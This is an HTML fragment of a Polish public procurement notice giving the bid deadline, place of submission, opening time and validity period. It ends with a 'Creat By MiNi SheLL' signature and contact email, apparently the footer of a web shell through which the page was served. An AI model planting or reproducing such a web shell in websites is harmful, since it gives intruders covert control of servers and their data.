zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-18 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-18 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com